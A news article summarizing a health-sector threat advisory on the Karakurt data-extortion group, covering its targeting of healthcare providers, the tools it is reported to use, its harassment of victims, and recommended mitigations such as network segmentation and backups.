On Aug. 24, the Health Sector Cybersecurity Coordination Center (HC3) released an analyst note regarding the Karakurt ransomware group, also known as the Karakurt Team and Karakurt Lair—a fairly new cybercrime group that emerged in late 2021. The note stresses that the healthcare and public health sector (HPH) is a target for this group.
The note says that “Karakurt actors claim to steal data and then threaten to auction it off or release it to the public unless they receive payment of the demanded ransom, which have been known to range from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim. The group likely has ties to the Conti ransomware group, either as a business relationship or as a side business with Conti. Karakurt is also known for extensive harassment campaigns against victims to shame them. HC3 recommends the Healthcare and Public Health Sector (HPH) be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise.”
HC3 reports that at least four attacks have affected the HPH sector since June 2022. The attacks affected an assisted living facility, a dental firm, a healthcare provider, and a hospital. Karakurt generally conducts scanning, reconnaissance, and collection on its targets for about a two-month time period. Then the threat actor gains access to files that include patient names, addresses, Social Security numbers, dates of birth, medical history, diagnosis information, treatment information, medical record numbers, and health insurance information. The bad actor will then threaten to release the information unless a ransom is paid.
The note adds that “Once access to a compromised system has been obtained, Karakurt actors deploy Cobalt Strike beacons to enumerate a network, install Mimikatz to pull plain-text credentials, use AnyDesk to obtain persistent remote control, and utilize additional situation-dependent tools to elevate privileges and move laterally within a network.
“Karakurt actors then compress (typically with 7zip) and exfiltrate large sums of data—and, in many cases, entire network-connected shared drives in volumes exceeding 1 terabyte (TB)—using open source applications and File Transfer Protocol (FTP) services, such as Filezilla, and cloud storage services including rclone and Mega.nz. Following the exfiltration of data, Karakurt actors present the victim with ransom notes by way of ‘readme.txt’ files, via emails sent to victim employees over the compromised email networks, and emails sent to victim employees from external email accounts. The ransom notes reveal the victim has been hacked by the ‘Karakurt Team’ and threaten public release or auction of the stolen data. The instructions include a link to a TOR URL with an access code. Visiting the URL and inputting the access code open a chat application over which victims can negotiate with Karakurt actors to have their data deleted.”
Victims of Karakurt have described extensive harassment campaigns from the bad actors. Employees, business partners, and clients receive many emails and calls warning the recipients to encourage the victims to negotiate with the actors to prevent the distribution of victim data.
Mitigations recommended by CISA include implanting a recovery plan, implementing network segmentation, and regularly backing up data.